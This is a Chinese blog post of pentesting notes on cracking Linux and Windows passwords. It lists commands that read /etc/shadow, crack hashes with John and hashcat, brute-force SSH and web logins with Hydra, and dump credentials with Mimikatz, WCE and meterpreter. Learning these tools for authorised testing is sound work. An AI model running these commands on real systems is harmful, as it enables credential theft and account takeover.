Windows、Linux密码破解—John、Hydra、hashcat、Mimikatz等工具基本使用

最新推荐文章于 2024-07-29 20:43:31 发布
最新推荐文章于 2024-07-29 20:43:31 发布
阅读量3k 收藏 14
点赞数
分类专栏: 渗透测试 后渗透 文章标签: linux 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/negnegil/article/details/120330035
版权

密码破解字典

https://github.com/danielmiessler/SecLists

Linux密码破解

在linux中,密码放在/etc/passwd和/etc/shadow中,如果我们读取到了加密密码,就可以复制下来对其进行破解。

cat /etc/passwd
cat /etc/shadow

john the ripper

加密密码破解字典:

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-75.txt

##使用词表破解哈希密码,其中pass.txt中放着加密后的密码
john --rules --wordlist = /usr/share/wordlists/rockyou.txt pass.txt

##使用unshadow结合/etc/passwd 和 /etc/shadow 为一个文件,并破解
unshadow /etc/passwd /etc/shadow > pass.txt
john --wordlist = /usr/share/john/password.lst pass.txt

##破解特定哈希密码
john --wordlist = /usr/share/wordlists/rockyou.txt --format=raw-sha1 pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 pass.txt

##破解多个文件
john -fromat=raw-md5 pass.txt pass1.txt

Hydra

##通用命令
hydra <ip> -l <用户名> -P <密码列表> <破解表单类型> "<url>:<表单参数>:<failure string>:Cookie"

# 破解网站
hydra -L <用户名列表> -p <密码列表> <主机ip> http-post-form "<路径>:<表单参数>:<失败提示信息>"
#如破击dvwa登录
hydra -L <用户名列表> -P <密码列表> <主机ip> http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

# SSH的root账号密码爆破
hydra -l root -P /usr/share/wordlists/fasttrack.txt <主机ip> ssh

# 其他端口上的SSH,账号可以是一个文件
hydra -s 22022 -l root -P /usr/share/wordlists/fasttrack.txt <主机ip> ssh

# 破解web表单
hydra <主机ip> http-post-form -s <端口> -P /usr/share/wordlists/list -L /usr/share/wordlists/list "/endpoit/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage"

hashcat

##暴力破解加密密码
hashcat -m <加密类型> -a <破解模式> -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt

##如
hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt --force


# m 是散列格式(例如 m 13100 是 Kerberos 5)
# a 0 是字典攻击
# o cracked.txt 是破解密码的输出文件
# target_hashes.txt 是要破解的哈希
# /usr/share/wordlists/rockyou.txt 是词表的绝对路径
# --force 是我总是必须添加的东西(认为它与 GPU 相关)

Windows密码转存

使用meterpreter的hashdump命令转储哈希

meterpreter > hashdump

在这里插入图片描述

Mimikatz

下载地址

https://github.com/gentilkiwi/mimikatz/releases

##右键以管理员权限运行
##获取调试权限
privilege::debug

##抓取密码
sekurlsa::logonpasswords

在具有Isass进程的权限才可以抓到密码
在这里插入图片描述

Windows 凭证编辑器(WCE)

下载地址:

https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip

##以管理员身份运行cmd,执行wce.exe -w
wce.exe -w

没获取到
在这里插入图片描述

MSF中的Mimikatz

(在msf中名为kiwi)

##加载并查看使用方法
load kiwi
help kiwi

在这里插入图片描述

获取syskey(需要system权限)

lsa_dump_sam

在这里插入图片描述

Windows密码破解

使用john对上述获取到的hash密码进行破解

Thgilil
关注
专栏目录
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 290
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
渗透测试工具实战技巧合集
Sylon的博客
06-26 1848
渗透测试工具实战技巧合集 本文为作者总结自己在渗透测试中常用的一些小技巧。原文分为两部分,译者将其合二为一,方便大家查阅。 原文出自https://www.freebuf.com/sectool/105524.html来自FreeBuf黑客与极客(FreeBuf.COM) 最好的 NMAP 扫描策略 # 适用所有大小网络最好的 ...
Kali-linux破解纯文本密码工具mimikatz
2301_77162959的博客
05-22 1128
当成功的获取到一个远程会话时,使用mimikatz工具可以很快的恢复密码。从该界面可以看到,当前系统中bob用户的哈希密码值中。从输出的信息中可以看到,输出的信息类似msv命令输出的信息。唯一不同的就是,这里可以看到使用哈希加密的原始密码。从以上信息中,可以看到bob用户的密码为www.123。从输出的信息中,可以看到获取到了一个与192.168.6.110主机的远程会话。从输出的信息中,可以看到mimikatz模块已加载成功。以上输出的信息就是当前用户摘要式身份验证的信息。搜集整理学习路线&笔记。
使用Jhon工具破解Windows密码
m0_59392076的博客
11-09 3211
日常记录
Kali Linux John the Ripper Hashcat
最新发布
courageox的博客
07-29 258
Kali Linux John the Ripper Hashcat
哈希处理介绍-使用Mimikatz以及JohnWindows用户密码破解
ran的博客
02-06 6936
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2374
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash
john破解系统密码windows和kali)
热门推荐
boy_from_village的博客
05-20 4万+
 使用john、和samdump2破解window密码Window密码获取方式:使用老毛桃或者大白菜制作U盘启动PE系统可自由复制粘贴CAM和system文件保存在U盘内。或者使用SAMCopyer和SAMInside获取sam和system文件。。。方式:通过window下的sam和system文件获取密码hash值,使用john破解密码hash获得密码明文。环境:kali 所需软件:kal...
5种最流行的密码破解工具:保护您的账号
qqqqqkmbnjjhb的专栏
05-22 7799
密码我们到底是怎么到达这里的?他们已经存在了很多年,但是关于它们还有很多话要说。在大多数组织中,密码是阻止网络犯罪分子和遭受网络攻击的受害者之间的区别。对于这么多组织的众多应用程...
kali密码破解笔记
fhl5203的博客
11-01 2941
密码破解 思路 目标系统实施了强安全措施 ·安装了所有补丁 ·无任何已知漏洞 ·无应用层漏洞 ·攻击面最小化 社会工程学 获取目标系统用户身份 ·非授权用户不受信,认证用户可以访问守信资源 ·已有用户账号权限受限,需要提权 ·不会触发系统报警 身份认证方法 证明你是你声称你是的那个人 ·你知道什么(账号密码、pin、passphrase) ·你有什么(令牌、token、key、证书、密宝、手机) ...
弱口令审计-工具用法大全
anquanniu的博客
09-11 1948
目前,帐号仍然是最主要的用户身份认证方式,但由于安全意识的淡漠,很多人仍在使用弱口令。而一旦泄漏,所有安全防范机制都将形同虚设。 本课程《用户口令审计》是『Kali Linux工具大全』技术系列的第5部分。向大家详述Kali Linux中全部在线/离线弱口令审计工具的用法,以此来帮助大家提前发现自己系统中的弱口令问题。 用户口令审计工具介绍 1、crunch 在面对妥善保护的系统时,我们可能很难发现其漏洞和可渗透的突破口。作为渗透测试人员,此时应尝试对目标系统进行弱密码的检测。密码破解成败的关键在于字典的
linux读用户密码,Mimipenguin:读取当前登录用户密码Linux下的Mimikatz
weixin_36200490的博客
04-29 499
mimipenguinA tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.DetailsTakes advantage of cleartext credentials in memo...
渗透测试--5.3.使用john破解密码
我是个好人呀,????
05-17 3516
John the Ripper一款免费、开源的暴力密码破解器,它有多平台版本,支持目前大多数的加密算法,如DES、MD4、MD5等。该软件破解密码方式简单而粗暴,理论上只要时间上面允许,该软件可以破译绝大多数用户密码John the Ripper免费的开源软件,支持目前大多数的加密算法,如DES、MD4、MD5等。它支持多种不同类型的系统架构,包括Unix、LinuxWindows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码
John密码破解姿势
weixin_51725318的博客
09-12 3683
John密码破解姿势
kali下通过msf中kiwi(mimikatz)模块的使用
失心少年
09-11 1395
kiwi模块:mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。
Kali学习 | 密码攻击:6.8 破解纯文本密码工具mimikatz
qq_43233085的博客
01-23 1500
Kali学习 | 密码攻击:6.8 破解纯文本密码工具mimikatzmimikatz 介绍操作步骤恢复哈希密码获取kerberos(网络认证协议)信息获取wdigest(摘要式身份验证)信息恢复livessp身份验证信息 mimikatz 介绍 mimikatz是一款强大的系统密码破解获取工具。 该工具有段时间是作为一个独立程序运行。 现在已被添加到Metasploit框架中,并作为一个可加载的...
win下John列举GPU No OpenCL-capable were detected解决办法
SBBTD的博客
02-18 1955
症状: 解决: 如果你确定电脑的显卡及驱动支持opencl, 那么将C:\Windows\System32\OpenCL.dll (n卡也可能是nvopencl.dll,A卡可以搜索下类似的文件,我自己是N卡没法测试) 复制到john/run里并改名,替换原来的cygOpenCL-1.dll即可。 效果: by:随便吧土豆 ...
使用john the ripper、hashcat破解linux用户密码
云舒的博客
02-27 4350
使用john the ripper破解linux用户的密码 linux基本命令: kali系统的安装(附上安装成功截图): linux系统中有一个用户密码配置文件/etc/shadow,里面存放着用户名,Hash加密后的值 /etc/passwd文件是用户账户配置文件,只保存用户账户的基本信息,并不保存密码信息. 一、john the ripper 工具的安装 登录进kali系统里,打开终端切换至桌面目录 wget http://www.openwall.com/john/j/john-1.
KIOPTRIX: LEVEL 1.2 (#3)
Mysmycbx的博客
03-21 241
发现是lotusCMS,在searchsploit上搜索,没有发现什么有用的信息,那就去google上搜索。发现github里有一个RCE的sh文件,这里下载下来查看。发现mysql数据库内容,这里尝试ssh登录,发现失败,那就进入mysql查看后台数据。没发现什么有用的信息。
hydra工具windows班本哪下载
09-01
要下载Hydra工具Windows版本,你可以访问以下网站:https://github.com/vanhauser-thc/thc-hydra/releases 在这个网站上,你可以找到Hydra工具的各个版本和操作系统的适配版本。找到适用于Windows操作系统的版本,然后点击下载链接。通常,你会找到一个.exe文件,这是Hydra工具的可执行文件。 下载完成后,你可以将该文件保存在你选择的位置。然后,运行该文件以安装和配置Hydra工具。在安装过程中,你可能需要提供管理员权限以完成安装。安装完成后,你就可以使用Hydra工具来执行网络渗透测试或其他任务。 需要注意的是,Hydra工具使用需要一定的技术知识和合法授权。确保你遵守相关的法律和道德准则,并只在合法的环境中使用工具
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值